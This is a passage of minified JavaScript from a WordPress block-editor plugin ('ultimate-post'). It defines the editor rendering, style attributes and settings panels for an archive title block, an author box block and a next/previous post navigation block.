"),P),x&&(0,o.createElement)("div",{className:"ultp-archive-desc"},B)),2==w&&(0,o.createElement)("div",{className:"ultp-archive-content",style:U},(0,o.createElement)("div",{className:"ultp-archive-overlay",style:T?{backgroundColor:I}:{}}),b&&(0,o.createElement)(a.VI,{tag:C,className:"ultp-archive-name"},v&&(0,o.createElement)("span",{className:"ultp-archive-prefix"},h," "),P),x&&(0,o.createElement)("div",{className:"ultp-archive-desc"},B))))))}},56963:(e,t,l)=>{"use strict";l.d(t,{Z:()=>a});var o=l(92165);const a={blockId:{type:"string",default:""},currentPostId:{type:"string",default:""},layout:{type:"string",default:"1"},contentAlign:{type:"string",default:"left",style:[{depends:[{key:"contentAlign",condition:"==",value:"left"}],selector:"{{ULTP}} .ultp-block-archive-title { text-align:{{contentAlign}}; }"},{depends:[{key:"contentAlign",condition:"==",value:"center"}],selector:"{{ULTP}} .ultp-block-archive-title { text-align:{{contentAlign}}; }"},{depends:[{key:"contentAlign",condition:"==",value:"right"}],selector:"{{ULTP}} .ultp-block-archive-title { text-align:{{contentAlign}}; }"}]},titleShow:{type:"boolean",default:!0},excerptShow:{type:"boolean",default:!0},prefixShow:{type:"boolean",default:!1},showImage:{type:"boolean",default:!1},titleTag:{type:"string",default:"h1"},customTaxTitleColor:{type:"boolean",default:!1},seperatorTaxTitleLink:{type:"string",default:ultp_data.category_url,style:[{depends:[{key:"customTaxTitleColor",condition:"==",value:!0}]}]},titleColor:{type:"string",default:"var(--postx_preset_Contrast_1_color)",style:[{selector:"{{ULTP}} .ultp-block-archive-title .ultp-archive-name { color:{{titleColor}}; }"},{depends:[{key:"customTaxTitleColor",condition:"==",value:!1}],selector:"{{ULTP}} .ultp-block-archive-title .ultp-archive-name { color:{{titleColor}}; }"}]},titleTypo:{type:"object",default:{openTypography:1,size:{lg:"28",unit:"px"},spacing:{lg:"0",unit:"px"},height:{lg:"32",unit:"px"},transform:"",decoration:"none",family:"",weight:""},style:[{depends:[{key:"titleShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-block-archive-title .ultp-archive-name"}]},titlePadding:{type:"object",default:{lg:{unit:"px"}},style:[{depends:[{key:"titleShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-block-archive-title .ultp-archive-name { padding:{{titlePadding}}; }"}]},excerptColor:{type:"string",default:"var(--postx_preset_Contrast_2_color)",style:[{depends:[{key:"excerptShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-block-archive-title .ultp-archive-desc { color:{{excerptColor}}; }"}]},excerptTypo:{type:"object",default:{openTypography:1,size:{lg:14,unit:"px"},height:{lg:"22",unit:"px"},decoration:"none",family:""},style:[{depends:[{key:"excerptShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-block-archive-title .ultp-archive-desc"}]},excerptPadding:{type:"object",default:{lg:{top:"0",bottom:"",unit:"px"}},style:[{depends:[{key:"excerptShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-block-archive-title .ultp-archive-desc { padding: {{excerptPadding}}; }"}]},prefixText:{type:"string",default:"Sample Prefix Text"},prefixTop:{type:"boolean",default:!1,style:[{selector:"{{ULTP}} .ultp-archive-prefix { display: block; }"}]},prefixColor:{type:"string",default:"var(--postx_preset_Contrast_1_color)",style:[{depends:[{key:"prefixShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-block-archive-title .ultp-archive-prefix { color:{{prefixColor}}; }"}]},prefixTypo:{type:"object",default:{openTypography:1,size:{lg:"",unit:"px"},spacing:{lg:"0",unit:"px"},height:{lg:"",unit:"px"},transform:"",decoration:"none",family:"",weight:""},style:[{depends:[{key:"prefixShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-block-archive-title .ultp-archive-prefix"}]},prefixPadding:{type:"object",default:{lg:{top:10,bottom:5,unit:"px"}},style:[{depends:[{key:"prefixShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-block-archive-title .ultp-archive-prefix { padding:{{prefixPadding}}; }"}]},imgWidth:{type:"object",default:{lg:"",ulg:"%"},style:[{depends:[{key:"layout",condition:"==",value:["1"]}],selector:"{{ULTP}} .ultp-block-archive-title .ultp-archive-image { max-width: {{imgWidth}}; }"}]},imgHeight:{type:"object",default:{lg:"",unit:"px"},style:[{depends:[{key:"layout",condition:"==",value:["1"]}],selector:"{{ULTP}} .ultp-block-archive-title .ultp-archive-image {object-fit: cover; height: {{imgHeight}}; }"}]},imgSpacing:{type:"object",default:{lg:"10"},style:[{depends:[{key:"layout",condition:"==",value:["1"]}],selector:"{{ULTP}} .ultp-block-archive-title .ultp-archive-image { margin-bottom: {{imgSpacing}}px; }"}]},customTaxColor:{type:"boolean",default:!1},seperatorTaxLink:{type:"string",default:ultp_data.category_url,style:[{depends:[{key:"customTaxColor",condition:"==",value:!0}]}]},TaxAnimation:{type:"string",default:"none"},TaxWrapBg:{type:"string",default:"",style:[{depends:[{key:"customTaxColor",condition:"!=",value:!0}],selector:"{{ULTP}} .ultp-block-archive-title .ultp-archive-content .ultp-archive-overlay { background:{{TaxWrapBg}}; }"}]},TaxWrapHoverBg:{type:"string",style:[{depends:[{key:"customTaxColor",condition:"!=",value:!0}],selector:"{{ULTP}} .ultp-block-archive-title .ultp-archive-content:hover .ultp-archive-overlay { background:{{TaxWrapHoverBg}}; }"}]},TaxWrapBorder:{type:"object",default:{openBorder:0,width:{top:1,right:1,bottom:1,left:1},color:"#009fd4",type:"solid"},style:[{depends:[{key:"layout",condition:"==",value:["2"]}],selector:"{{ULTP}} .ultp-block-archive-title .ultp-archive-content"}]},TaxWrapHoverBorder:{type:"object",default:{openBorder:0,width:{top:1,right:1,bottom:1,left:1},color:"#009fd4",type:"solid"},style:[{depends:[{key:"layout",condition:"==",value:["2"]}],selector:"{{ULTP}} .ultp-block-archive-title .ultp-archive-content:hover"}]},TaxWrapShadow:{type:"object",default:{openShadow:0,width:{top:1,right:1,bottom:1,left:1},color:"#009fd4"},style:[{depends:[{key:"layout",condition:"==",value:["2"]}],selector:"{{ULTP}} .ultp-block-archive-title .ultp-archive-content"}]},TaxWrapHoverShadow:{type:"object",default:{openShadow:0,width:{top:1,right:1,bottom:1,left:1},color:"#009fd4"},style:[{depends:[{key:"layout",condition:"==",value:["2"]}],selector:"{{ULTP}} .ultp-block-archive-title .ultp-archive-content:hover"}]},TaxWrapRadius:{type:"object",default:{lg:{top:"",bottom:"",unit:"px"}},style:[{depends:[{key:"layout",condition:"==",value:["2"]}],selector:"{{ULTP}} .ultp-block-archive-title .ultp-archive-content { border-radius: {{TaxWrapRadius}}; }"}]},TaxWrapHoverRadius:{type:"object",default:{lg:{top:"",bottom:"",unit:"px"}},style:[{depends:[{key:"layout",condition:"==",value:["2"]}],selector:"{{ULTP}} .ultp-block-archive-title .ultp-archive-content:hover { border-radius: {{TaxWrapHoverRadius}}; }"}]},customOpacityTax:{type:"string",default:.6,style:[{selector:"{{ULTP}} .ultp-block-archive-title .ultp-archive-content .ultp-archive-overlay { opacity: {{customOpacityTax}}; }"}]},customTaxOpacityHover:{type:"string",default:.9,style:[{selector:"{{ULTP}} .ultp-taxonomy-items li a:hover .ultp-archive-overlay { opacity: {{customTaxOpacityHover}}; }"}]},TaxWrapPadding:{type:"object",default:{lg:{top:"20",bottom:"20",left:"20",right:"20",unit:"px"}},style:[{depends:[{key:"layout",condition:"==",value:["2"]}],selector:"{{ULTP}} .ultp-block-archive-title .ultp-archive-content { padding: {{TaxWrapPadding}}; }"}]},...(0,o.t)(["advanceAttr"],["loadingColor"])}},53056:(e,t,l)=>{"use strict";var o=l(67294),a=l(94878),i=l(56963),n=l(94772);const{__}=wp.i18n,{registerBlockType:r}=wp.blocks;r(n,{icon:(0,o.createElement)("img",{className:"ultp-block-icon",src:ultp_data.url+"assets/img/blocks/archive-title.svg"}),attributes:i.Z,edit:a.Z,save:()=>null})},62568:(e,t,l)=>{"use strict";l.d(t,{Z:()=>m});var o=l(67294),a=l(53049),i=l(99838),n=l(54324),r=l(31760),s=l(48784);const{__}=wp.i18n,{Fragment:p}=wp.element,{InspectorControls:c,RichText:u,useBlockProps:d}=wp.blockEditor;function m(e){const{setAttributes:t,name:l,attributes:m,clientId:g,className:y,attributes:{blockId:b,advanceId:v,layout:h,imgShow:f,writtenByShow:k,writtenByText:w,authorBioShow:x,metaShow:T,metaPosition:_,allPostLinkShow:C,viewAllPostText:E,authorNameTag:S,currentPostId:P}}=e,L={setAttributes:t,name:l,attributes:m,clientId:g};(0,n.S)({blockId:b,clientId:g,currentPostId:P,setAttributes:t,checkRef:!1});const I=(0,o.createElement)("div",{className:"ultp-post-author-image-section ultp-post-author-image-editor"},(0,o.createElement)("img",{src:ultp_data.url+"assets/img/ultp-author.jpg",className:"ultp-post-author-image",alt:"author_image"}));b&&(0,i.Kh)(m,"ultimate-post/author-box",b);const B=d({className:`ultp-block-${b} ${y}`,...v&&{id:v}});return(0,o.createElement)(p,null,(0,o.createElement)(c,null,(0,o.createElement)(s.Z,{store:L}),(0,a.dH)()),(0,o.createElement)(r.Z,{include:[{type:"layout",block:"post-author",key:"layout",label:__("Layout","ultimate-post"),options:[{img:"assets/img/layouts/builder/auth_box/auth_box1.png",label:"Layout 1",value:"layout1"},{img:"assets/img/layouts/builder/auth_box/auth_box2.png",label:"Layout 2",value:"layout2",pro:!0},{img:"assets/img/layouts/builder/auth_box/auth_box4.png",label:"Layout 3",value:"layout3",pro:!0},{img:"assets/img/layouts/builder/auth_box/auth_box3.png",label:"Layout 4",value:"layout4",pro:!0}]}],store:L}),(0,o.createElement)("div",B,(0,o.createElement)("div",{className:"ultp-block-wrapper"},(0,o.createElement)("div",{className:"ultp-author-box ultp-author-box-"+h+"-content"},f&&"layout4"!==h&&I,(0,o.createElement)("div",{className:"ultp-post-author-details"},(0,o.createElement)("div",{className:"ultp-post-author-title"},k&&(0,o.createElement)(u,{key:"editable",tagName:"span",className:"ultp-post-author-written-by",placeholder:__("Change Text…","ultimate-post"),onChange:e=>t({writtenByText:e}),value:w}),(0,o.createElement)(a.VI,{tag:S,className:"ultp-post-author-name"},(0,o.createElement)("a",{href:"#"},"Author Name"))),T&&"top"==_&&(0,o.createElement)("div",{className:"ultp-post-author-meta"},(0,o.createElement)("span",{className:"ultp-total-post"},"72 Posts"),(0,o.createElement)("span",{className:"ultp-total-comment"},"32 Comments")),x&&(0,o.createElement)("div",{className:"ultp-post-author-bio"},(0,o.createElement)("span",{className:"ultp-post-author-bio-meta"},"There are many variations of passages of Lorem Ipsum available, but the majority have suffered alteration in some form, by injected humour, or randomised words which don't look even slightly believable")),T&&"bottom"==_&&(0,o.createElement)("div",{className:"ultp-post-author-meta"},(0,o.createElement)("span",{className:"ultp-total-post"},"72 Posts"),(0,o.createElement)("span",{className:"ultp-total-comment"},"32 Comments")),C&&(0,o.createElement)("div",{className:"ultp-author-post-link"},(0,o.createElement)("a",{className:"ultp-author-post-link-text",href:"#"},E))),f&&"layout4"===h&&I))))}},48784:(e,t,l)=>{"use strict";l.d(t,{Z:()=>n});var o=l(67294),a=l(53049),i=l(92637);const{__}=wp.i18n,n=({store:e})=>(0,o.createElement)(i.Sections,null,(0,o.createElement)(i.Section,{slug:"setting",title:__("Setting","ultimate-post")},(0,o.createElement)(a.T,{title:"inline",include:[{position:0,data:{type:"layout",block:"post-author",key:"layout",label:__("Layout","ultimate-post"),options:[{img:"assets/img/layouts/builder/auth_box/auth_box1.png",label:"Layout 1",value:"layout1"},{img:"assets/img/layouts/builder/auth_box/auth_box2.png",label:"Layout 2",value:"layout2",pro:!0},{img:"assets/img/layouts/builder/auth_box/auth_box4.png",label:"Layout 3",value:"layout3",pro:!0},{img:"assets/img/layouts/builder/auth_box/auth_box3.png",label:"Layout 4",value:"layout4",pro:!0}]}},{data:{type:"alignment",key:"authorBoxAlign",disableJustify:!0,label:__("Alignment","ultimate-post")}}],store:e}),(0,o.createElement)(a.T,{title:__("Content Style","ultimate-post"),include:[{data:{type:"color2",key:"boxContentBg",label:__("Content Background","ultimate-post")}},{data:{type:"border",key:"boxContentBorder",label:__("Border","ultimate-post")}},{data:{type:"dimension",key:"boxContentRadius",label:__("Radius","ultimate-post"),step:1,unit:!0,responsive:!0}},{data:{type:"dimension",key:"boxContentPad",label:__("Padding","ultimate-post"),step:1,unit:!0,responsive:!0}}],store:e}),(0,o.createElement)(a.T,{title:__("Author Image","ultimate-post"),depend:"imgShow",include:[{data:{type:"range",key:"imgSize",min:0,max:400,step:1,responsive:!0,label:__("Size","ultimate-post")}},{data:{type:"range",key:"imgSpace",min:0,max:250,step:1,responsive:!0,unit:["px","em","rem","%"],label:__("Space","ultimate-post")}},{data:{type:"range",key:"imgUp",min:0,max:250,step:1,responsive:!0,unit:["px","em","rem","%"],label:__("Image Top Position","ultimate-post")}},{data:{type:"border",key:"imgBorder",label:__("Border","ultimate-post")}},{data:{type:"dimension",key:"imgRadius",label:__("Radius","ultimate-post"),step:1,unit:!0,responsive:!0}},{data:{type:"toggle",key:"authImgStack",label:__("Stack on Mobile","ultimate-post")}},{data:{type:"group",key:"imgRatio",justify:!0,options:[{value:"100",label:__("Low","ultimate-post")},{value:"200",label:__("Medium","ultimate-post")},{value:"300",label:__("Heigh","ultimate-post")}],label:__("Image Ratio","ultimate-post")}}],store:e}),(0,o.createElement)(a.T,{title:__("Written By Label","ultimate-post"),depend:"writtenByShow",include:[{data:{type:"text",key:"writtenByText",label:__("Text","ultimate-post")}},{data:{type:"color",key:"writtenByColor",label:__("Color","ultimate-post")}},{data:{type:"typography",key:"writtenByTypo",label:__("Typography","ultimate-post")}}],store:e}),(0,o.createElement)(a.T,{title:__("Author Name","ultimate-post"),include:[{data:{type:"tag",key:"authorNameTag",label:__("Tag","ultimate-post")}},{data:{type:"color",key:"authorNameColor",label:__("Color","ultimate-post")}},{data:{type:"color",key:"authorNameHoverColor",label:__("Hover Color","ultimate-post")}},{data:{type:"typography",key:"authorNameTypo",label:__("Typography","ultimate-post")}}],store:e}),(0,o.createElement)(a.T,{title:__("Author Bio","ultimate-post"),depend:"authorBioShow",include:[{data:{type:"color",key:"authorBioColor",label:__("Color","ultimate-post")}},{data:{type:"typography",key:"authorBioTypo",label:__("Typography","ultimate-post")}},{data:{type:"dimension",key:"authorBioMargin",label:__("Margin","ultimate-post"),step:1,unit:!0,responsive:!0}}],store:e}),(0,o.createElement)(a.T,{title:__("Meta","ultimate-post"),depend:"metaShow",include:[{data:{type:"group",key:"metaPosition",label:__("Meta Position","ultimate-post"),justify:!0,options:[{value:"top",label:__("Top","ultimate-post")},{value:"bottom",label:__("Bottom","ultimate-post")}]}},{data:{type:"color",key:"metaColor",label:__("Color","ultimate-post")}},{data:{type:"typography",key:"metaTypo",label:__("Typography","ultimate-post")}},{data:{type:"color",key:"metaBg",label:__("Background","ultimate-post")}},{data:{type:"dimension",key:"metaPadding",label:__("Padding","ultimate-post"),step:1,unit:!0,responsive:!0}},{data:{type:"dimension",key:"metaMargin",label:__("Margin","ultimate-post"),step:1,unit:!0,responsive:!0}},{data:{type:"border",key:"metaBorder",label:__("Border","ultimate-post")}}],store:e}),(0,o.createElement)(a.T,{title:__("View All Post Link","ultimate-post"),depend:"allPostLinkShow",include:[{data:{type:"text",key:"viewAllPostText",label:__("Text","ultimate-post")}},{data:{type:"typography",key:"viewAllPostTypo",label:__("Typography","ultimate-post")}},{data:{type:"tab",content:[{name:"normal",title:__("Normal","ultimate-post"),options:[{type:"color",key:"viewAllPostColor",label:__("Color","ultimate-post")},{type:"color2",key:"viewAllPostBg",label:__("Background Color","ultimate-post")},{type:"dimension",key:"viewAllPostRadius",label:__("Border Radius","ultimate-post"),step:1,unit:!0,responsive:!0}]},{name:"hover",title:__("Hover","ultimate-post"),options:[{type:"color",key:"viewAllPostHoverColor",label:__("Hover Color","ultimate-post")},{type:"color2",key:"viewAllPostBgHoverColor",label:__("Hover Bg Color","ultimate-post")},{type:"dimension",key:"viewAllPostHoverRadius",label:__("Hover Radius","ultimate-post"),step:1,unit:!0,responsive:!0}]}]}},{data:{type:"separator"}},{data:{type:"dimension",key:"viewAllPostPadding",label:__("Padding","ultimate-post"),step:1,unit:!0,responsive:!0}},{data:{type:"dimension",key:"viewAllPostMargin",label:__("Margin","ultimate-post"),step:1,unit:!0,responsive:!0}}],store:e})),(0,o.createElement)(i.Section,{slug:"advanced",title:__("Advanced","ultimate-post")},(0,o.createElement)(a.yB,{store:e}),(0,o.createElement)(a.Mg,{pro:!0,store:e}),(0,o.createElement)(a.iv,{store:e})))},64530:(e,t,l)=>{"use strict";l.d(t,{Z:()=>o});const o={blockId:{type:"string",default:""},layout:{type:"string",default:"layout1"},currentPostId:{type:"string",default:""},imgShow:{type:"boolean",default:!0},writtenByShow:{type:"boolean",default:!0},authorBioShow:{type:"boolean",default:!0},metaShow:{type:"boolean",default:!0},allPostLinkShow:{type:"boolean",default:!0},authorBoxAlign:{type:"object",default:"center",style:[{depends:[{key:"layout",condition:"!=",value:"layout2"},{key:"layout",condition:"!=",value:"layout4"}],selector:"{{ULTP}} .ultp-author-box {text-align:{{authorBoxAlign}};}"}]},boxContentBg:{type:"object",default:{openColor:1,type:"color",color:"var(--postx_preset_Base_2_color)"},style:[{selector:"{{ULTP}} .ultp-author-box"}]},boxContentBorder:{type:"object",default:{openBorder:0},style:[{selector:"{{ULTP}} .ultp-author-box"}]},boxContentRadius:{type:"object",default:{lg:"",unit:"px"},style:[{selector:"{{ULTP}} .ultp-author-box { border-radius:{{boxContentRadius}}; }"}]},boxContentPad:{type:"object",default:{lg:"20",unit:"px"},style:[{selector:"{{ULTP}} .ultp-author-box { padding:{{boxContentPad}}; }"}]},imgSize:{type:"object",default:{lg:"100"},style:[{depends:[{key:"imgShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-author-box img { height:{{imgSize}}px !important; width:{{imgSize}}px !important; }"}]},imgSpace:{type:"object",default:{lg:"20",unit:"px"},style:[{depends:[{key:"imgShow",condition:"==",value:!0},{key:"layout",condition:"==",value:"layout1"}],selector:"{{ULTP}} .ultp-post-author-image-section > img { margin-bottom: {{imgSpace}}; }"},{depends:[{key:"authImgStack",condition:"==",value:!1},{key:"imgShow",condition:"==",value:!0},{key:"layout",condition:"==",value:"layout2"}],selector:"{{ULTP}} .ultp-post-author-image-section { margin-right: {{imgSpace}}; }"},{depends:[{key:"imgShow",condition:"==",value:!0},{key:"layout",condition:"==",value:"layout3"}],selector:"{{ULTP}} .ultp-post-author-image-section > img { margin-bottom: {{imgSpace}}; }"},{depends:[{key:"imgShow",condition:"==",value:!0},{key:"authImgStack",condition:"==",value:!1},{key:"layout",condition:"==",value:"layout4"}],selector:"{{ULTP}} .ultp-post-author-image-section { margin-left: {{imgSpace}}; }"},{depends:[{key:"imgShow",condition:"==",value:!0},{key:"authImgStack",condition:"==",value:!0},{key:"layout",condition:"==",value:"layout2"}],selector:"{{ULTP}} .ultp-post-author-image-section { margin-right: {{imgSpace}}; } @media only screen and (max-width: 600px) { {{ULTP}} .ultp-post-author-image-section { margin-bottom: {{imgSpace}}; margin-right: 0px; }  }"},{depends:[{key:"imgShow",condition:"==",value:!0},{key:"authImgStack",condition:"==",value:!0},{key:"layout",condition:"==",value:"layout4"}],selector:"{{ULTP}} .ultp-post-author-image-section { margin-left: {{imgSpace}}; } @media only screen and (max-width: 600px) { {{ULTP}} .ultp-post-author-image-section { margin-bottom: {{imgSpace}}; margin-left: 0px; }}"}]},imgUp:{type:"object",default:{lg:"60",unit:"px"},style:[{depends:[{key:"imgShow",condition:"==",value:!0},{key:"layout",condition:"==",value:"layout3"}],selector:"{{ULTP}} .ultp-author-box-layout3-content .ultp-post-author-image-section > img { margin-top: -{{imgUp}}; } {{ULTP}} .ultp-block-wrapper { margin-top: {{imgUp}}; }"}]},imgBorder:{type:"object",default:{openBorder:0,width:{top:1,right:1,bottom:1,left:1},color:"#000",type:"solid"},style:[{depends:[{key:"imgShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-post-author-image-section > img"}]},imgRadius:{type:"object",default:{lg:"100",unit:"px"},style:[{depends:[{key:"imgShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-post-author-image-section > img { border-radius:{{imgRadius}}; }"}]},authImgStack:{type:"boolean",default:!0,style:[{selector:"@media only screen and (max-width: 600px) { .ultp-author-box-layout2-content {  display: block; text-align: center; } }"}]},imgRatio:{type:"string",default:"100"},writtenByText:{type:"string",default:"Written by"},writtenByColor:{type:"string",default:"var(--postx_preset_Contrast_3_color)",style:[{depends:[{key:"writtenByShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-post-author-written-by {color:{{writtenByColor}};}"}]},writtenByTypo:{type:"object",default:{openTypography:1,size:{lg:"20",unit:"px"},height:{lg:"",unit:"px"}},style:[{depends:[{key:"writtenByShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-post-author-written-by"}]},authorNameTag:{type:"string",default:"h4"},authorNameColor:{type:"string",default:"var(--postx_preset_Contrast_1_color)",style:[{selector:"{{ULTP}} .ultp-post-author-name a {color:{{authorNameColor}} !important; }"}]},authorNameHoverColor:{type:"string",default:"",style:[{selector:"{{ULTP}} .ultp-post-author-name a:hover { color:{{authorNameHoverColor}} !important; }"}]},authorNameTypo:{type:"object",default:{openTypography:1,size:{lg:"20",unit:"px"},height:{lg:"",unit:"px"}},style:[{selector:"{{ULTP}} .ultp-post-author-name"}]},authorBioColor:{type:"string",default:"var(--postx_preset_Contrast_3_color)",style:[{depends:[{key:"authorBioShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-post-author-bio-meta {color:{{authorBioColor}};}"}]},authorBioTypo:{type:"object",default:{openTypography:1,size:{lg:"14",unit:"px"},height:{lg:"22",unit:"px"}},style:[{depends:[{key:"authorBioShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-post-author-bio"}]},authorBioMargin:{type:"object",default:{lg:{top:"20",bottom:"",left:"",right:"",unit:"px"}},style:[{depends:[{key:"authorBioShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-post-author-bio { margin:{{authorBioMargin}}; }"}]},metaPosition:{type:"string",default:"bottom"},metaColor:{type:"string",default:"var(--postx_preset_Contrast_2_color)",style:[{depends:[{key:"metaShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-total-post, {{ULTP}} .ultp-total-comment { color: {{metaColor}}; }"}]},metaTypo:{type:"object",default:{openTypography:0,size:{lg:"",unit:"px"},height:{lg:"",unit:"px"},decoration:"none",transform:"",family:"",weight:""},style:[{depends:[{key:"metaShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-post-author-meta"}]},metaMargin:{type:"object",default:{lg:{top:"12",unit:"px"}},style:[{depends:[{key:"metaShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-post-author-meta { margin:{{metaMargin}}; }"}]},metaPadding:{type:"object",default:{lg:{unit:"px"}},style:[{depends:[{key:"metaShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-post-author-meta { padding:{{metaPadding}}; }"}]},metaBg:{type:"string",default:"",style:[{depends:[{key:"metaShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-post-author-meta { background:{{metaBg}}; }"}]},metaBorder:{type:"object",default:{openBorder:0,width:{top:1,right:"0",bottom:"0",left:"0"},color:"#009fd4",type:"solid"},style:[{depends:[{key:"metaShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-post-author-meta"}]},viewAllPostText:{type:"string",default:"View All Posts"},viewAllPostTypo:{type:"object",default:{openTypography:1,size:{lg:"14",unit:"px"},height:{lg:"",unit:"px"},decoration:"none",transform:"",family:"",weight:""},style:[{depends:[{key:"allPostLinkShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-author-post-link-text"}]},viewAllPostColor:{type:"string",default:"var(--postx_preset_Primary_color)",style:[{depends:[{key:"allPostLinkShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-author-post-link a:not(.wp-block-button__link), {{ULTP}} .ultp-author-post-link-text {color:{{viewAllPostColor}};}"}]},viewAllPostBg:{type:"string",default:"",style:[{depends:[{key:"allPostLinkShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-author-post-link-text"}]},viewAllPostRadius:{type:"object",default:{lg:"",unit:"px"},style:[{depends:[{key:"allPostLinkShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-author-post-link-text { border-radius:{{viewAllPostRadius}}; }"}]},viewAllPostHoverColor:{type:"string",default:"var(--postx_preset_Secondary_color)",style:[{depends:[{key:"allPostLinkShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-author-post-link .ultp-author-post-link-text:hover { color:{{viewAllPostHoverColor}}; }"}]},viewAllPostBgHoverColor:{type:"string",default:"",style:[{depends:[{key:"allPostLinkShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-author-post-link-text:hover"}]},viewAllPostHoverRadius:{type:"object",default:{lg:"",unit:"px"},style:[{depends:[{key:"allPostLinkShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-author-post-link-text:hover { border-radius:{{viewAllPostHoverRadius}}; }"}]},viewAllPostPadding:{type:"object",default:{lg:{unit:"px"}},style:[{depends:[{key:"allPostLinkShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-author-post-link-text { padding:{{viewAllPostPadding}}; }"}]},viewAllPostMargin:{type:"object",default:{lg:{top:"15",bottom:"",left:"",right:"",unit:"px"}},style:[{depends:[{key:"allPostLinkShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-author-post-link { margin:{{viewAllPostMargin}}; }"}]},...(0,l(92165).t)(["advanceAttr"],["loadingColor"])}},41544:(e,t,l)=>{"use strict";var o=l(67294),a=l(62568),i=l(64530),n=l(23826);const{__}=wp.i18n,{registerBlockType:r}=wp.blocks;r(n,{icon:(0,o.createElement)("img",{className:"ultp-block-icon",src:ultp_data.url+"assets/img/blocks/builder/author_box.svg",alt:"Post Author"}),attributes:i.Z,edit:a.Z,save:()=>null})},90191:(e,t,l)=>{"use strict";l.d(t,{Z:()=>m});var o=l(67294),a=l(53049),i=l(99838),n=l(54324),r=l(31760),s=l(64766),p=l(40200);const{__}=wp.i18n,{InspectorControls:c,useBlockProps:u}=wp.blockEditor,{Fragment:d}=wp.element;function m(e){const{setAttributes:t,name:l,attributes:m,clientId:g,className:y,attributes:{blockId:b,advanceId:v,headingEnable:h,imageShow:f,titleShow:k,navDivider:w,iconShow:x,dividerBorderShape:T,arrowIconStyle:_,dateShow:C,titlePosition:E,layout:S,prevHeadText:P,nextHeadText:L,currentPostId:I}}=e,B={setAttributes:t,name:l,attributes:m,clientId:g};(0,n.S)({blockId:b,clientId:g,currentPostId:I,setAttributes:t,checkRef:!1});const U=(e,t,l)=>{const a=(0,o.createElement)("div",{className:"ultp-nav-img "+(x&&"style2"==S?"ultp-npb-overlay":"")},x&&"style2"==S&&(l?e:t),f&&(0,o.createElement)("img",{src:ultp_data.url+"assets/img/ultp-placeholder.jpg"}));return(0,o.createElement)("a",{className:l?`ultp-nav-block-prev ultp-nav-prev-${S}`:`ultp-nav-block-next ultp-nav-next-${S}`,href:"#"},h&&!E&&"style2"==S&&(0,o.createElement)("div",{className:l?"ultp-prev-title":"ultp-next-title"},l?P:L),l&&x&&"style2"!=S&&e,(0,o.createElement)("div",{className:"ultp-nav-inside"},h&&!E&&"style2"!=S&&(0,o.createElement)("div",{className:l?"ultp-prev-title":"ultp-next-title"},l?P:L),(0,o.createElement)("div",{className:"ultp-nav-inside-container"},1==l&&a,0==l&&"style3"==S&&a,(0,o.createElement)("div",{className:"ultp-nav-text-content"},h&&E&&(0,o.createElement)("div",{className:l?"ultp-prev-title":"ultp-next-title"},l?P:L),C&&(0,o.createElement)("div",{className:"ultp-nav-date"},l?"25 Jan 2022":"10 Feb 2024"),k&&(0,o.createElement)("div",{className:"ultp-nav-title"},l?"Sample Title of the Previous Post":"Sample Title of the Next Post")),0==l&&"style3"!=S&&(0,o.createElement)("span",null,a))),0==l&&x&&"style2"!=S&&t)},M=(0,o.createElement)("span",{className:`ultp-icon ultp-icon-${_}`},s.ZP["left"+_]),A=(0,o.createElement)("span",{className:`ultp-icon ultp-icon-${_}`},s.ZP["right"+_]);b&&(0,i.Kh)(m,"ultimate-post/next-previous",b);const H=u({className:`ultp-block-${b} ${y}`,...v&&{id:v}});return(0,o.createElement)(d,null,(0,o.createElement)(c,null,(0,o.createElement)(p.Z,{store:B}),(0,a.dH)()),(0,o.createElement)(r.Z,{include:[{type:"layout",key:"layout",pro:!0,tab:!0,label:__("Style","ultimate-post"),block:"next-preview",options:[{img:"assets/img/layouts/builder/next_prev/next_prev_1.png",label:__("Style 1","ultimate-post"),value:"style1"},{img:"assets/img/layouts/builder/next_prev/next_prev_2.png",label:__("Style 2","ultimate-post"),value:"style2",pro:!0},{img:"assets/img/layouts/builder/next_prev/next_prev_3.png",label:__("Style 3","ultimate-post"),value:"style3",pro:!0}]}],store:B}),(0,o.createElement)("div",H,(0,o.createElement)("div",{className:"ultp-block-wrapper"},(0,o.createElement)("div",{className:"ultp-block-nav"+(f?" next-prev-img":"")},U(M,A,!0),w&&T&&(0,o.createElement)("span",{className:"ultp-divider"}),U(M,A,!1)))))}},40200:(e,t,l)=>{"use strict";l.d(t,{Z:()=>n});var o=l(67294),a=l(53049),i=l(92637);const{__}=wp.i18n,n=({store:e})=>(0,o.createElement)(i.Sections,null,(0,o.createElement)(i.Section,{slug:"setting",title:__("Style","ultimate-post")},(0,o.createElement)(a.T,{initialOpen:!0,title:__("General","ultimate-post"),include:[{data:{type:"layout",key:"layout",pro:!0,tab:!0,label:__("Style","ultimate-post"),block:"next-preview",options:[{img:"assets/img/layouts/builder/next_prev/next_prev_1.png",label:__("Style 